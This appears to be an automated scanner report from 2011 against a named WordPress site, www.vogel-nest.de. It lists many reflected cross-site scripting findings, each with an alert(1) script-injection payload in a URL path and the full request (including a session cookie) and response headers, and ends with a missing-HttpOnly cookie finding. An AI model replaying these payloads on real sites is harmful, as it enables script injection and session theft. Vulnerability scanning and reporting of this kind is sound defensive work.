The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92c24"><script>alert(1)</script>4fcd5852e5c was submitted in the REST URL parameter 2. This input was echoed as 92c24\"><script>alert(1)</script>4fcd5852e5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js92c24"><script>alert(1)</script>4fcd5852e5c/jquery/jquery.js?ver=1.4.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:36 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c3f6"><script>alert(1)</script>c1b467c5fb4 was submitted in the REST URL parameter 3. This input was echoed as 1c3f6\"><script>alert(1)</script>c1b467c5fb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery1c3f6"><script>alert(1)</script>c1b467c5fb4/jquery.js?ver=1.4.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:56 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c4b"><script>alert(1)</script>328a9160d70 was submitted in the REST URL parameter 4. This input was echoed as b3c4b\"><script>alert(1)</script>328a9160d70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/jquery/jquery.jsb3c4b"><script>alert(1)</script>328a9160d70?ver=1.4.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:10 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92958"><script>alert(1)</script>6a989f1a3be was submitted in the REST URL parameter 1. This input was echoed as 92958\"><script>alert(1)</script>6a989f1a3be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes92958"><script>alert(1)</script>6a989f1a3be/js/prototype.js?ver=1.6.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:11 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:12 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e61b"><script>alert(1)</script>34c78edaa6 was submitted in the REST URL parameter 2. This input was echoed as 1e61b\"><script>alert(1)</script>34c78edaa6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js1e61b"><script>alert(1)</script>34c78edaa6/prototype.js?ver=1.6.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:30 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18886
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27738"><script>alert(1)</script>941d79e9b21 was submitted in the REST URL parameter 3. This input was echoed as 27738\"><script>alert(1)</script>941d79e9b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/prototype.js27738"><script>alert(1)</script>941d79e9b21?ver=1.6.1 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:50 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c73c"><script>alert(1)</script>68c7fabdeae was submitted in the REST URL parameter 1. This input was echoed as 5c73c\"><script>alert(1)</script>68c7fabdeae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes5c73c"><script>alert(1)</script>68c7fabdeae/js/scriptaculous/effects.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:16 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bdd"><script>alert(1)</script>193e3db455c was submitted in the REST URL parameter 2. This input was echoed as 98bdd\"><script>alert(1)</script>193e3db455c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js98bdd"><script>alert(1)</script>193e3db455c/scriptaculous/effects.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:32 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53240"><script>alert(1)</script>8c837bd113d was submitted in the REST URL parameter 3. This input was echoed as 53240\"><script>alert(1)</script>8c837bd113d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/scriptaculous53240"><script>alert(1)</script>8c837bd113d/effects.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:58 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fe2"><script>alert(1)</script>a0c923de908 was submitted in the REST URL parameter 4. This input was echoed as 36fe2\"><script>alert(1)</script>a0c923de908 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/scriptaculous/effects.js36fe2"><script>alert(1)</script>a0c923de908?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:21 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 698aa"><script>alert(1)</script>2a4df7d8b75 was submitted in the REST URL parameter 1. This input was echoed as 698aa\"><script>alert(1)</script>2a4df7d8b75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes698aa"><script>alert(1)</script>2a4df7d8b75/js/scriptaculous/wp-scriptaculous.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:21:58 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:21:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca901"><script>alert(1)</script>b433d0c1ca1 was submitted in the REST URL parameter 2. This input was echoed as ca901\"><script>alert(1)</script>b433d0c1ca1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/jsca901"><script>alert(1)</script>b433d0c1ca1/scriptaculous/wp-scriptaculous.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:16 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:18 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f50aa"><script>alert(1)</script>ea74b2eeeb2 was submitted in the REST URL parameter 3. This input was echoed as f50aa\"><script>alert(1)</script>ea74b2eeeb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/scriptaculousf50aa"><script>alert(1)</script>ea74b2eeeb2/wp-scriptaculous.js?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:32 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb31b"><script>alert(1)</script>e134fe2da46 was submitted in the REST URL parameter 4. This input was echoed as fb31b\"><script>alert(1)</script>e134fe2da46 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/scriptaculous/wp-scriptaculous.jsfb31b"><script>alert(1)</script>e134fe2da46?ver=1.8.3 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:55 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18930
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1df6"><script>alert(1)</script>6ce4eb9bca9 was submitted in the REST URL parameter 1. This input was echoed as e1df6\"><script>alert(1)</script>6ce4eb9bca9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includese1df6"><script>alert(1)</script>6ce4eb9bca9/js/swfobject.js?ver=2.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:23 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d096"><script>alert(1)</script>d708b3e8a0f was submitted in the REST URL parameter 2. This input was echoed as 4d096\"><script>alert(1)</script>d708b3e8a0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js4d096"><script>alert(1)</script>d708b3e8a0f/swfobject.js?ver=2.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:22:47 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:22:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e391"><script>alert(1)</script>30e0f465183 was submitted in the REST URL parameter 3. This input was echoed as 3e391\"><script>alert(1)</script>30e0f465183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js/swfobject.js3e391"><script>alert(1)</script>30e0f465183?ver=2.2 HTTP/1.1 Host: www.vogel-nest.de Proxy-Connection: keep-alive Referer: http://www.vogel-nest.de/wiki88b4a%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed4f14d53e5d/Main/ImageSnap Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=hjfq1e50o6i5niqqk10hhbos05
Response
HTTP/1.1 404 Not Found Date: Wed, 09 Feb 2011 13:23:09 GMT Server: Apache/2.2.3 (CentOS) X-Pingback: http://www.vogel-nest.de/xmlrpc.php X-Powered-By: W3 Total Cache/0.9.1.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Last-Modified: Wed, 09 Feb 2011 13:23:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=e3sc4fomn182rfjcvlhh1i0e97; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
Request
GET /wiki/Main/ImageSnap HTTP/1.1 Host: www.vogel-nest.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
